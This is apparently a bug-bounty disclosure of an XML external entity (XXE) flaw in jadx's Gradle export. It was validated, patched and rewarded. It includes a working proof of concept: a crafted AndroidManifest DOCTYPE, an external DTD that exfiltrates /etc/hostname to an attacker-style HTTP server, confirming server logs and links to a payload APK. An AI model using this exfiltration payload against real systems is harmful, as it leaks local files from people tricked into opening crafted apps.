Improper Restriction of XML External Entity Reference in skylot/jadx

Valid

Reported on

Jan 12th 2022

Description

parseXml() function in ExportGradleProject is not secured against XXE because it does not include the disallow-doctype-decl attribute, therefore JADX is vulnerable to XXE when parsing a malicious Android Manifest when exporting Android app to Gradle. In

https://github.com/skylot/jadx/blob/f9bf27579e3ad5f89239ea9f571e8b50739e8920/jadx-core/src/main/java/jadx/core/export/ExportGradleProject.java#L142L147

DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
Document document = builder.parse(new InputSource(new StringReader(xmlContent)));

DocumentBuilderFactory does not have disallow-doctype-decl attribute set to true, leaving it vulnerable to XXE.

Proof Of Concept

1: Build an android app with the following AndroidManifest.xml stored. You can use my built APK with a malicious AndroidManifest.xml file https://drive.google.com/file/d/1D4QBk-YJH8xadGv1vpz9rBTDN9X43pUC/view?usp=sharing in order to test this.

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://127.0.0.1/malicious.dtd"> %xxe;]>
... [---malicious APK continued here---]

2: Open a new terminal and place in a file name malicious.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.0.2.4/?x=%file;'>">
%eval;
%exfiltrate;

3: In the same terminal as step 2, open a HTTP server (which mimics an attacker server) and leave it running

~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)

4: Now, export the APK to Gradle

jadx -e /path/to/malicious/apkfile.apk

5: The HTTP server (which mimics an attacker server will receive the contents of victim /etc/hostname

➜  ~ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /malicious.dtd HTTP/1.1" 200 -
10.0.2.4 - - [12/Jan/2022 14:36:41] "GET /?x=testserver HTTP/1.1" 200 -

Impact

This vulnerability is capable of XXE (info disclosure) when users are tricked into exporting a malicious Android App with a crafted AndroidManifest file to Gradle.

Patch

https://github.com/Haxatron/jadx/commit/c6a78c0d6dc990a4a0f8962d51823aa6ca3aefd2

We are processing your report and will contact the skylot/jadx team within 24 hours. a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
haxatron submitted a
patch
a year ago
haxatron modified the report
a year ago
skylot validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
skylot marked this as fixed in 1.3.2 with commit d22db3 a year ago
haxatron has been awarded the fix bounty
This vulnerability will not receive a CVE
haxatron
a year ago

Researcher

If anyone is viewing the report and still wants to test this, I have moved the payload to GitHub https://github.com/Haxatron/CVE-2022-0219/blob/main/payload.apk

to join this conversation